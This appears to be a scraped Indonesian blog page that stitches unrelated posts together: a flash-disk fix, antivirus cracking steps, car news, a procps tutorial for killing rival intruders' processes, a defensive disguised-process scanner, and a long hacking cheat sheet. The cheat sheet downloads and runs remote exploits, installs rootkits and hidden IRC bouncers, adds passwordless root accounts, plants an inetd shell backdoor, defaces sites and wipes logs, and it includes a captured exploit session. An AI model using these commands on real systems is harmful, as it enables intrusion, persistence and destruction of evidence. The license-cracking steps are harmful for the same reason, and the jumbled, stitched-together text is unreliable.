The story began when I put the Google Earth program onto my flash disk. When I tried to delete the program, it suddenly could not be deleted, so I reformatted my flash disk, but that failed as well. Because my first format failed I got curious, and in the end I formatted it a second time, and it turned out my flash disk could no longer be opened, in other words it was broken, and the message "please insert disk" appeared, while its properties showed 0 kb.
But don't worry, there is a way to repair it. Follow the steps below:
1. Download HP Drive Boot Utility, 45 Mb. Freeware. This software also supports flash disks that are not made by HP.
2. Install the software.
3. Plug the faulty flash disk into the computer.
4. Run the software and select the drive of your flash disk.
5. Choose Create New or Replace Existing Configuration
Now give it a try, and good luck.
Friday, September 30, 2011
cracking kaspersky pure
Berikutcara cracking kaspersky pure..
1. disableself defense
2. matikanproteksidan exit aplikasi
3. Jalankan Kaspersky Hybride Pure-Internet Security 1.4.exe
4.Aktifkankembali Kaspersky pure Anda
5.Aktivasidenganmenggunakan key... (Karenasudahdipatchinggunakanopsi yang paling bawahtidakadaketerangannyauntuk browse key
6. Masukkan key (andabisapake key KIS 2010 atau KIS2011)
Setelah Cracking SelesaiGunakanJuga Anti Blacklistnya
Anti Blacklist bertujuan agar key AndaTidakterblock (Key Blocked)
Dengan Anti Blacklist ini key yang terblacklistbisaandagunakanlagi. Langkah2kurang lebihhampirsamadenganlangkah di atas
Jeep's Updated Production Plan Includes Four New Models Covering Most Segments by 2014

While future production plans for the Fiat-Chrysler alliance's Italian brands (Fiat, Alfa Romeo and Lancia) can change from one moment to the next for a variety of reasons, up until now the American branch of the group has proved to be more reliable and on time when it comes to new projects.
At a recent investors presentation in Germany, the Fiat Group unveiled its product plans for Jeep, which the automaker considers as one of the two global brands in the alliance, the other one being Alfa Romeo.
Under the revitalization plan, which runs up until 2014, Jeep will expand its portfolio with a series of new models to cover all SUV/Crossover segments. The group's admittedly ambitious goal is to double Jeep's global sales from around 400,000 units in 2010 to about 800,000 vehicles in 2014.
HOW TO ADD A RADIO TO YOUR BLOG (add an FM radio to your blog)
How to add an FM radio to a blog: would you like to have online radio on your blog?
I have a fairly interesting FM radio script that you can try...
Here we go:
1. Add a gadget: on your blog, click settings, click add gadget, and look for HTML/JavaScript.
2. Copy the code below into the contents of the HTML/JavaScript gadget you just chose...
PROCESS MANIPULATION WITH PROCPS
Posted: January 18, 2007 by miji in hacking
You have spent the whole night mass-scanning a class B IP range with the latest
xpl0it-scanner release, and after finding a vulnerable "b0x" it turns out you
are the umpteenth person to get in there. (Hehehehe......typical, script kiddies
can only do this sort of thing; picking a specific target and then getting the
b0x, wow.....now that is 31337.)
OK, back to the topic. It turns out that on that b0x there are already several
"tamu_ilegal" (illegal guests) who have installed a backd00r, sniFFer or psyBNC,
or who are 'in action'. You surely know what the lifespan of such an illegal b0x
is when it is used by many "tamu_ilegal" residing there. So when you run into
this, have you ever thought about doing a KILL -9 on the PIDs of the other
"tamu_ilegal" programs? If you were thinking of using
"ps -awux | grep proses-bla-ble-blu", sigh.......how tedious.
Or have you ever KILLed a process that turned out to be the heart of the OS just
because you mistyped its PID?
You can imagine how painful that is, even though you went to the trouble of
checking the PID with your trusty weapon: "ps -awux | grep proses-bla-ble-blu".
So if you want to know (for those who don't know yet; those who already do,
please correct me if there are mistakes or omissions in this discussion) an
effective, efficient process manipulator, read on. ;>
Procps is a package of process tools known for its reliability. Among other
things the package contains the "top" command, whose use you surely already
know. This article is not about "top" but about the other utilities, among them:
1) skill : sends a signal to processes selected by username, terminal or PID.
The signal can be HUP, INT, KILL, STOP or CONT.
Example:
To stop (freeze) the activity of a user logged in on terminal pts/2:
r00t@finger:~# skill -STOP pts/2
To unfreeze that user so they can continue their activity:
r00t@finger:~# skill -CONT pts/2
2) snice : almost the same as skill, but instead of sending a signal it sets the
priority directly. The snice default is +4. The priority range is from
+20 (last priority) to -20 (first priority).
Example:
To 'renice' (set the priority of) all processes run by user "tamu_ilegal" to
last priority, use +20:
r00t@finger:~# snice +20 tamu_ilegal    <--- tamu_ilegal will think their shell is lagging.
3) pkill : almost the same as skill, but uses normal parameters. It is typically
used to avoid confusion between a "username", "processname" and "terminalname"
that share the same name. For example, with username = finger, processname =
finger and terminalname = bash, the mistake that would occur with the skill
command can be avoided.
Example:
r00t@finger:~# skill -KILL finger bash    <--- is finger the username or the processname???
Compare:
r00t@finger:~# pkill -KILL -u finger bash    <--- the -u parameter specifies that finger is the username.
4) pgrep : works the same way as pkill, but instead of sending a signal to each
process, pgrep prints every matching PID to STDOUT.
Example:
Most script kiddies run a process faker so that the legitimate root does not
get suspicious. However, almost all of those process fakers are named httpd.
kill@finger:~$ pgrep httpd
4312
4313
4314
4315
4316
4317
5671
hehehhehehe................
5) vmstat : gives information about virtual memory and CPU statistics:
kill@finger:~$ vmstat
   procps                      memory    swap          io     system         cpu
 r  b  w   swpd   free   buff  cache  si  so    bi    bo   in    cs  us  sy  id
 0  0  0   5676   6716  35804  58940   0   0     9     9    7     9   0   0  29
If you want to watch the changes in vmstat every few seconds, add a number to
the vmstat command line. That number is the delay time before the data is
refreshed.
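From the administrator's side, `pgrep httpd` alone cannot tell a real web server from a process faker that merely calls itself httpd. The following is an added example, not code from the original article: it compares the name a process claims with the binary it actually runs. The sample records, PIDs and paths are constructed, and the reason labels are this example's own.

```python
import os

# Locations where long-running daemons do not normally keep their binaries.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
DELETED = " (deleted)"  # suffix the kernel appends to /proc/PID/exe targets


def classify(argv0, exe):
    """Return the reasons a process looks disguised (empty list if none).

    These are leads for review, not proof: symlinked or versioned
    interpreters can also produce a name mismatch.
    """
    reasons = []
    name = argv0.lstrip("-")                 # login shells appear as "-bash"
    words = name.split()
    # Daemons that rewrite their title show e.g. "sshd: alice [priv]".
    claimed = os.path.basename(words[0].rstrip(":")) if words else ""
    deleted = exe.endswith(DELETED)
    real_path = exe[:-len(DELETED)] if deleted else exe
    real = os.path.basename(real_path)

    if name != name.strip() or real != real.strip():
        reasons.append("padded-name")        # e.g. a binary renamed to "bash "
    if claimed != real.strip():
        reasons.append("name-mismatch")      # argv[0] differs from the binary
    if deleted:
        reasons.append("exe-deleted")        # binary unlinked after start
    if real_path.startswith(SCRATCH_DIRS) or "/." in real_path:
        reasons.append("odd-location")       # scratch or hidden directory
    return reasons


def scan(records):
    """records: iterable of (pid, argv0, exe). Return {pid: reasons} for hits."""
    hits = {}
    for pid, argv0, exe in records:
        reasons = classify(argv0, exe)
        if reasons:
            hits[pid] = reasons
    return hits


def read_proc(proc_root="/proc"):
    """Collect (pid, argv0, exe) from a live Linux /proc (root sees all PIDs)."""
    records = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        base = os.path.join(proc_root, entry)
        try:
            with open(os.path.join(base, "cmdline"), "rb") as fh:
                argv0 = fh.read().split(b"\0")[0].decode(errors="replace")
            exe = os.readlink(os.path.join(base, "exe"))
        except OSError:
            continue  # kernel thread, exited process, or no permission
        if argv0:
            records.append((int(entry), argv0, exe))
    return records


# Constructed sample records: (pid, argv[0], target of /proc/PID/exe).
SAMPLE = [
    (812, "httpd", "/usr/sbin/httpd"),
    (4410, "httpd", "/var/tmp/.x/bnc"),
    (4502, "-bash", "/bin/bash"),
    (4633, "bash ", "/var/tmp/.log/bash "),
    (4700, "sshd: alice [priv]", "/usr/sbin/sshd"),
    (4811, "syslogd", "/home/apache/syslogd (deleted)"),
]

if __name__ == "__main__":
    for pid, reasons in sorted(scan(SAMPLE).items()):
        print(pid, ", ".join(reasons))
```

On a live host, `scan(read_proc())` applies the same checks to the running processes.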
Hacking Shell
Posted: January 22, 2007 by miji in hacking
TRIK MEMBUAT PSYBNC : =================================================== unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ; cd var/tmp/;
mkdir …. ; cd …. ; wget http://www.geocities.com/lifron/Pre-psyBNC.tgz;
mv Pre-psyBNC.tgz .sh ; tar -zxvf .sh ; rm .sh ; mv psybnc .log ;
cd .log ; make; mv psybnc “bash ” ; rm psybnc.conf ; wget http://www.geocities.com/lifron/psybnc.conf.20075.txt;
mv psybnc.conf.20075.txt psybnc.txt ; mv psybnc.txt ” ” ; pwd ; PATH=$PATH:/var/tmp/…./.log/;
“bash ” ” “mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud ;
find |grep psybnc
===================================================
: TRIK MENGHAPUS LOG :
=================================================== echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
rm -f /.bash_history /root/.bash_history /var/tmp/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
=================================================== rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r
===================================================
: LOCAL ROOT MANDRAKE :
=================================================== unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
cd /tmp ; mkdir ” ” ; cd ” ”
1. wget www.geocities.com/lifron/local.tar.gz
2. tar -zxvf local.tar.gz
3. cd local
4. ./lconfex -p
5. ./lconfex -f
6. ./handy.sh 0xbffff625 0xbffff5f1
7.mkdir segfault.eng ; touch segfault.eng/segfault.eng
8. ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
9. id
10. root
11. /usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /home/.kuntua
12. echo “tondano::0:0::/.tondano:/bin/bash” >> /etc/passwd
passwd -d kuntua
Changing password for user kuntua
Removing password for user kuntua
passwd: Success
13. Login ke shell terus bersihkan log dan pasang backdoor
14.last |grep kuntua
15. su tondano
16. wget http//www.geocities.com/lifron/remove.c
17. gcc -o r remove.c -DGENERIC
18. ./remove /home/kuntus
19. wget www.geocities.com/lifron/shv4.tar.gz
20. tar -zxvf shv4.tar.gz
21. cd shv4
22. ./setup pass port, misal ./setup gohanz 7788
23. /usr/sbin/userdel -r kuntua
24. cd /var/tmp/” ” <== Bersihkan semua tools 25. Test shell dengan port 7788, login as : root, password : gohanz =================================================== find index.html whereis index.html locate index.html default : cd /var/www/html echo “KuNTuA ToNDaNo Was Here” > index.html
=================================================== cd /home
mkdir apache
cd apache
mkdir public_html
chmod 705 public_html
cd public_html
mv index.html mnc.html
echo “KuNTuA ToNDaNo Was Here” > mnc.html
untuk mentesnya :
http://IP-yg-kamu-hack/~apache
===================================================
BIKIN BACKDOOR
=================================================== echo “kuntua 1979/tcp” >> /etc/services
echo “dial stream tcp nowait root /bin/sh sh -i” >> /etc/inetd.conf kill -HUP 135
telnet dengan port “1979″
=================================================== http://www.rocketpunch-ent.com/masslpd.tar
http://www.rocketpunch-ent.com/bindscan.c
http://www.rocketpunch-ent.com/lucstatdx.c
=================================================== [root@gila /]#rpm -qa | grep samba
samba-client-2.0.7-36
samba-2.0.7-36
samba-common-2.0.7-36
[root@gila /]# arp -n
Address HWtype HWaddress Flags Mask Iface
192.168.0.6 ether 00:08:C7:C2:0F:1B C eth1
192.168.0.4 ether 00:80:5F:0E:B7:28 C eth1
192.168.0.5 ether 00:00:B4:3C:AC:41 C eth1
192.168.0.2 ether 00:C0:4F:94:CC:70 C eth1
192.168.0.3 ether 00:10:5A:71:17:E3 C eth1
192.168.0.1 ether 00:00:21:28:8C:47 C eth1
[root@gila /]# nmblookup -d2 ‘*’ #untuk mendeteksi netbios
Got a positive name query response from 192.168.0.2 ( 192.168.0.2 )
Got a positive name query response from 192.168.0.4 ( 192.168.0.4 )
Got a positive name query response from 192.168.0.5 ( 192.168.0.5 )
Got a positive name query response from 192.168.0.3 ( 192.168.0.3 )
Got a positive name query response from 192.168.0.1 ( 192.168.0.1 )
[root@gila /]# locate findsmb
/usr/bin/findsmb
[root@router /]# findsmb
IP ADDR NETBIOS NAME WORKGROUP/OS/VERSION
—————————————–
192.168.0.1 CYBER1 [CYBER]
192.168.0.2 CYBER2 [CYBER]
192.168.0.3 CYBER3 [CYBER]
192.168.0.4 CYBER4 [CYBER]
192.168.0.5 CYBER5 [CYBER]
[root@gila /]# mkdir /mnt/samba
[root@gila /]# smbclient -L CYBER5
Got a positive name query response from 192.168.0.5 ( 192.168.0.5 )
Password:
Sharename Type Comment
——— —- ——-
A Disk
C Disk
D Disk
E Disk
IPC$ IPC Remote Inter Process Communication
[root@gila /]# smbmount //cyber5/d /mnt/samba/
Password:
[root@gila /]#
[root@gila /]# cd /mnt/samba/
[root@router samba]# ls
ffastun.ffa ffastun.ffo install RECYCLED
ffastun0.ffx ffastun.ffl film win98
[root@gila samba]# cd film/
[root@gila film]# ls
Amy_Lindsay_Forbidden_Sins_01[1].mpeg
=================================================== bash# tar -zxvf grabbb-0.1.0.tar.gz
bash# cd grabbb
bash# gcc -o grabbb grabbb.c
bash# ./grabbb -a 210.10.19.1 -b 210.100.50.1 23
=================================================== gcc sco-pop.c -o sco-pop
./sco-pop www.target.com
/var/adm
=================================================== : BERSIHKAN LOG :
=================================================== ctlog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/ctlog
messages -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/messages
sulog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/sulog
syslog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/syslog
utmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmp
utmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmpx
wtmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmp
wtmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmpx
=================================================== 1. wget www.geocities.com/lifron/openssl.tar.gz
2. tar -zxvf openssl.tar.gz
3. ./ssl IP
./ssl 204.145.119.253
=================================================== 1. wget www.geocities.com/lifron/massapache.tar.gz
2. tar -zxvf massapache.tar.gz
3. cd massapache
4. ./massossl 211 443 10
=================================================== 1. wget http://www.geocities.com/lifron/openssl-too-open.tar.gz
2. tar -zxvf openssl-too-open.tar.gz
3. cd openssl-too-open
4. ./openssl-too-open
./openssl-too-open -a 0×15 -v 212.70.224.129
=================================================== 1. wget www.geocities.com/lifron/shv4.tar.gz
2. tar xzf shv4.tar.gz
3. cd shv4
4. ./setup port passwd
./setup 7788 35b4tu
================================================ 1. wget http://www.geocities.com/lifron/massplor.tar.gz
2. tar -zxvf massplor.tar.gz
3. cd massplo
4. ./massplo IP -d 8
./massplo 210.10 -d 8
================================================ 1. wgetwww.geocities.com/lifron/mapache2x.gz
2. tar -zxvf mapache2x.gz
3. cd slamet
4. ./apache 208.134.131.49
./massossl 80 443 13
./mapache 443 210.10
================================================ 1. wget http://phaty.org/ptrace-kmod.c.txt
2. mv ptrace-kmod.c.txt ptrace-kmod.c
3. gcc -o ptrace-kmod ptrace-kmod.c
4. ./ptrace-kmod
================================================ 1. wget http://netric.org/exploit/sambal.c
2. gcc -o sambal sambal.c
3. ./sambal -d 0 -C 60 -S IP <== scanning ./sambal -d 0 -C 60 -S IP | grep samba ./sambal -b 0 -v IP <=== attack ================================================ SecureCRT: http://www.vandyke.com/ TTSSH: http://www.zip.com.au/~roca/ttssh.html PuTTY: http://www.chiark.greenend.org.uk/~sgtatham/putty.html SecureShell: http://public.srce.hr/~cigaly/ssh/ ================================================ DEFACE ================================================ find index.html whereis index.html locate index.html default : cd /var/www/html echo “KuNTuA Was Here” > index.html
================================================ cd /home
mkdir apache
cd apache
mkdir public_html
chmod 705 public_html
cd public_html
mv index.html mnc.html
echo “KuNTuA Was Here” > mnc.html
untuk mentesnya :
http://IP-yg-kamu-hack/~apache
================================================ Install WGET
================================================ 1. coba ketik: cat /etc/issue, untuk melihat Sistem Operasinya
2. ketik: ftp ftp.rpmfind.net
3. login : anonymous
4. cd linux/redhat/updates/7.0/en/os/
5. cd i386
6. get wget-1.8.2-4.70.i386.rpm
7. quit dari ftp
8. Proses Peng-Instalan
rpm -ivh wget-1.8.2-4.70.i386.rpm
http://www.rpmfind.net/linux/rpm2html/search.php?query=wget&submit=Search+…&system=redhat&arch=
=================================================================================================
wget http://202.158.16.157/ssh.diff
wget http://www.geocities.com/lifron/openssh-3.4p1.tar.gz
tar -zxvf openssh-3.5p1.tar.gz
cp ssh.diff openssh-3.5p1.tar.gz
cd openssh-3.5p1
patch -p < ssh.diff ./configure make ssh ./ssh -l root ./ssh -l root 66.136.37.101 ./ssh -l root 66.149.178.214 ================================================ : COMMAND ADDUSER : ================================================ /usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /etc/kuntua /usr/sbin/useradd tondano -u 0 -d / passwd -d kuntua Changing password for user kuntua Removing password for user kuntua passwd: Success passwd -d tondano Changing password for user tondano Removing password for user tondano passwd: Success ================================================ passwd kuntua New UNIX password: kuntua75 Retype new UNIX password: kuntua75 Changing password for user kuntua passwd: all authentication tokens updated successfully password tondano New UNIX password: kuntua75 Retype new UNIX password: kuntua75 Changing password for user tondano passwd: all authentication tokens updated successfully ================================================ ================================================ OPENSSL-TOO-OPEN ================================================ ./openssl -a 0×15 -v 61.220.53.91 : openssl-too-open : OpenSSL remote exploit by Solar Eclipse : Opening 30 connections Establishing SSL connections -> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
: Using the OpenSSL info leak to retrieve the addresses
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl0 : 0×80e1638
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl1 : 0×80e1638
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl2 : 0×80e1638
: Sending shellcode
-> send_client_hello
-> get_server_hello
ciphers: 0×80e1638 start_addr: 0×80e1578 SHELLCODE_OFS: 208
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_error
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell…
bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a;id
bash-2.05$ Linux Mandrake release 8.0 (Traktopel) for i586
bash-2.05$ Linux proxy2.rayongwit.net 2.4.3-20mdk #1 Sun Apr 15 23:03:10 CEST 2001 i686 unknown
bash-2.05$ uid=48(apache) gid=48(apache) groups=48(apache)
================================================ : MARI KITA MAINKAN ROOTNYA :
================================================ unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0
cd /tmp ; mkdir … ; cd ….
wget www.geocities.com/lifron/local.tar.gz
tar -zxvf local.tar.gz
cd local
./lconfex -p
./lconfex -f
./handy.sh 0xbffff625 0xbffff5f1
GOT IT! Your magic number is : 792
Now create a dir ’segfault.eng’ and touch a file named ’segfault.eng’ in it.
Then exec “./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792″ to get rootshell
*hint* : try play with -b if not succeed. [ n = 0..4 ]
ie : ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792 -b 1
Good Luck d0inks!
mkdir segfault.eng; touch segfault.eng/segfault.eng
./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
id
uid=0(root) gid=48(apache) groups=48(apache)
================================================ /usr/sbin/useradd mails -g wheel -s /bin/bash -d /home/mails
echo “apache::0:0::/mails:/bin/bash” >> /etc/passwd
passwd -d mails
Changing password for user mails
Removing password for user mails
passwd: Success
login ke shell
last | grep mails
su apache
mkdir /var/tmp/” ”
cd /var/tmp/” ”
wget http.phaty.org/remove.c.txt ; mv remove.c.txt remove.c
gcc -o r remove.c -DGENERIC
./remove /home/mails
wget www.radikal.org/backdoor.tar.gz
tar xzf backdoor.tar.gz
./setup 35b4tud1n91n 7788
/usr/sbin/userdel -r mails
/usr/sbin/userdel -r apache
cd /var/tmp/” ” <== del semua tools test shell with port 7788 and password 35b4tud1n91n ================================================ [Langkah Hapus Log I] ================================================ export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0 ================================================ [Langkah Hapus Log I] ================================================ rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r ================================================ wget http://brutalside.host.sk/tools/term chmod +x term ./term lonthe123 ================================================ wget http://brutalside.host.sk/tools/ftp.tgz gunzip ftp.tgz gzip ftp.tar tar -zxvf ftp.tar.gz cd ftp ./scan 163 22 10 ./scan 163 22 10 163 ================================================ scan port dgn pscan.c ==> www.packetstormsecurity.nl
bila port:23 vurnerable bisa running exploit
wget http://phaty.org/7350854_c.txt
mv 7350854_c.txt 7350854.c
gcc -o 7350854 7350854.c
./7350854 IP
./7350854 216.89.24.213
================================================ http://brutalside.host.sk/tools/kik
chmod +x kik
./kik “-bash” ./psybnc
================================================ ================================================ find / -name wtmp -print
find / -name utmp -print
find / -name lastlog -print
whereis wtmp
whereis utmp
whereis lastlog
===================
/usr/sbin/useradd -d /home/apache -s /bin/ksh apache
passwd apache
Terus konek ke shell dengan user biasa,masuk ke cd /tmp dan
wget www.norifumiya.org/r.c
gcc -o sh r.c
rm -rf r.v
rm -rf r.c
chown 0:0 /tmp/sh
chmod 777 sh
Sampai disini kita selesai dengan permainan di server target root
Sekarang kita kembali ke user dan ketik :
./sh
nah, apa yg terjadi setelah kita jalankan command ./sh…?
yg terjadi adalah uid dan gid kita adalah 0
================================================ wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
tar -zxvf psyBNC2.2.1-linux-i86-static.tar.gz
cd psybnc
echo “PSYBNC.SYSTEM.PORT1=60000″ >> psybnc.conf
echo “PSYBNC.SYSTEM.HOST1=*” >> psybnc.conf
echo “PSYBNC.HOSTALLOWS.ENTRY0=*;*” >> psybnc.conf
./psybnc psybnc.conf
================================================ wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh ; tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log
mv psybnc “syslogd ”
echo “PSYBNC.SYSTEM.PORT1=60000″ >> psybnc.conf
echo “PSYBNC.SYSTEM.HOST1=*” >> psybnc.conf
echo “PSYBNC.HOSTALLOWS.ENTRY0=*;*” >> psybnc.conf
mv psybnc.conf ” ” ; pwd
PATH=$PATH:/var/tmp/” “/.log/
“syslogd ” ” ”
mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud
================================================ +Command Mapache2x
- ./mapache RangeIP (mis: ./mapache 200 443 10 10) << Scan - ./apache IPTarget (Mis: ./apache 202.11159.67.176) ================================== +Command MassApache - ./massossl RangeIP (mis: ./massossl 22200 443 10 10) << Scan - ./osslx -a 0x0b -v IPTarget (Mis: ./ooosslx -a 0x0b -v 202.159.67.176) ================================================ +FTP Command 4 RooT - ./scan No Depan IP Target (Mis: ./scannn 210 21 10) =addUser= uid=0(root) gid=0(root) groups=50(ftp) Linux root.ivines.co.kr 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknow adduser? ketik /usr/sbin/adduser kuntua -g wheel -s /bin/bash -d /home/kuntua enter, buat password ketik passwd kuntua enter , abis itu ketik tondano tekan enter abis itu ketik lagi tondano , nb: ketik tondano dua kali itu kegunaan nya buat password kita Changing password for user ganjen passwd: all authentication tokens updated successfully berarti kita udah dapet user di shell tersebut, jadi tinggal login aja, jangan lupa catet ip nyah.. kalo mau dapet acces root ketik : /usr/sbin/useradd bash -u 0 -d / abis itu ketik lagi passwd -d bash apus jejak cd / rm -f /.bash_history /root/.bash_history /var/log/messages ln -s /dev/null /root/.bash_history touch /var/log/messages chmod 600 /var/log/messages rm -rf /var/log/lastlog cat > /var/log/lastlog
udah di ketik semua ? udahh… tekan ctrl d .
=================================
+Backdoor
NEWCOMER FREZZ BackDooR
- wget manadocarding.info/charles; chmod 755 charles; ./charles
= wget http://www.geocities.com/lifron/root; chmod 755 root; ./root
- wget http://www.geocities.com/cak_mus/shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup kuntua 7000
= wget http://www.geocities.com/lifron/shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup kuntua75 7000
***** ADD USER SHELL *****
/usr/sbin/useradd yrfon -g wheel -s /bin/bash -d /etc/.yrfon
passwd -d yrfon
—————–
Patch Your Root
—————–
wget http://www.geocities.com/lifron/patch.tar.gz
tar -zxvf patch.tar.gz
cd patch
./sexy
BERSIH JEJAK:manual
echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
==================================
LOCAL ROOT http://www.geocities.com/lifron/local.tar.gz
2.wget http://kelik-pelipur-lara.org/tools/local.tar.gz
cd local
chmod 755 *
./local.sh
./lconfex -p
./lconfex -f
sh ./handy.sh 0xbffffb24 0xbffff661
——————-
Add user dlm Root:
——————-
1.
/usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /etc/.kuntua
passwd -d kuntua
/usr/sbin/useradd moes -g wheel -s /bin/bash -d /etc/.moes
passwd -d moes
/usr/sbin/useradd cakmoes -g wheel -s /bin/bash -d /etc/.cakmoes
passwd -d cakmoes
2.
/usr/sbin/adduser jabriks -g root -d /var/jabriks
passwd -d jabriks
/usr/sbin/adduser mus -g root -d /var/mus
passwd -d mus
/usr/sbin/useradd tondano -g wheel -s /bin/bash -d /home/.tondano
passwd tondano75
—————————-
**add user accses root
—————————-
/usr/sbin/useradd bash -g root -u 0 -d /
passwd -d tondano
/usr/sbin/useradd jabrik -g root -u 0 -d /
passwd -d jabrik
/usr/sbin/useradd cakmoes -g root -u 0 -d /
passwd -d cakmoes
———–
Del User
———–
/usr/sbin/userdel -r [namauser]
PENTING
kalo so dapat ROOT
ketik id
uname -a
abis itu
ketik cd /tmp
—————–
——————————————–
ngeROOT ssh LINUX port 22:
wget http://packetstormsecurity.org/groups/teso/grabbb-0.1.0.tar.gz
tar -zxvf grabbb-0.1.0.tar.gz.tar.gz
gcc -o grabbb grabbb.c
cd grabbb
./grabbb -a IP -b IP port co:./grabbb -a 202.1.1.1 -b 202.1.1.1 22
66.201.243.210
——————————————–
wget www.suckmyass.org/ssh-scan8.tar.gz
tar
cd ssh-scan8
./r00t 203.20 -d 4 <— scan massal SSH ./r00t 203.20 -d 2 <— scan massal FTP ./r00t 203.20 -d 3 <— scan massal FTP ./r00t 134.7. -d 4 ——————————————– ngeROOT utk OS SCO : wget www.renjana.com/sco ./sco IP ——————————————– pasang BackDoor: 1. id uname -a cd /tmp wget http://packetstormsecurity.org/UNIX/penetration/rootkits/tk.tgz ls -al tar -zxvf tk.tgz cd tk ./t0rn kuntua 7000 ——————————————– LINKS: http://www.eviltime.com/download/exploit www.cahcepu.net www.vibrasi.net www.paktani.tk www.sisilainrevolt.org www.sitiung.com www.utay-doyan.cc www.atstake.com/research/redirect.html?users/10pht/nc110.tgz ======= Usage: ./sambal [-bBcCdfprsStv] [host] -b bruteforce (0 = Linux, 111 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2) -B bruteforce steps (defaulllt = 300) -c connectback ip address -C max childs for scan/bruttteforce mode (default = 40) -d bruteforce/scanmode delaaay in micro seconds (default = 100000) -f force -p port to attack (default = 139) -r return address -s scan mode (random) -S scan mode -t presets (0 for a list) -v verbose mode CONTOH: [esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0 samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be) ————————————————————– + Scan mode. + [192.168.0.3] Samba + [192.168.0.10] Windows + [192.168.0.35] Windows + [192.168.0.36] Windows + [192.168.0.37] Windows … + [192.168.0.133] Samba ./sambal -b 0 -v =========== Usage: ./mayday-linux -t [-pa] -t target The host to attack. -a password Default password is “chaaangeme”. -p port Default port is 8001. 
================ /usr/sbin/adduser httpd passwd httpd ============ PACTH SAMBA = root@redeye samba]# /etc/init.d/smb stop = Shutting down SMB services: [ OK ] = Shutting down NMB services: [ OK ] = [root@redeye root]# cd /etc/samba = [root@redeye samba]# wget http://master.samba.org/samba/ftp/patches/patch-2.2.8-2.2.8a.diffs.gz = [root@redeye samba]# gunzip patch-2.2.8-2.2.8a.diffs.gz = [root@redeye samba]# patch -p1 < patch-2.2.8-2.2.8a.diffs = [root@redeye samba]# /etc/init.d/smb start ======================= ======= VHOST = edit di httpd.conf = tinggal tambah no = kong di named.conf = 1. wget http://apache.towardex.com/httpd/apache_1.3.27.tar.gz = 2. tar zxvf apache_1.3.27.tar.gz = 3. cd apache_1.3.27 = 4. ./configure = 5. make = 6. make install = 7. /usr/local/apache/bin/apachectl start = cd /usr/local/apache/conf/httpd.conf = contoh = echo “” > httpd.conf
= echo “ServerName www.Cmaster4.net” > httpd.conf
= echo “DocumentRoot /home/iptek/public_html” > httpd.conf
= echo “ScriptAlias /cgi-bin /www/Cmaster4.net/cgi-bin” > httpd.conf
= echo “” >> httpd.conf
= ——————————
= ——————————
= ——————————
= find |grep name.conf
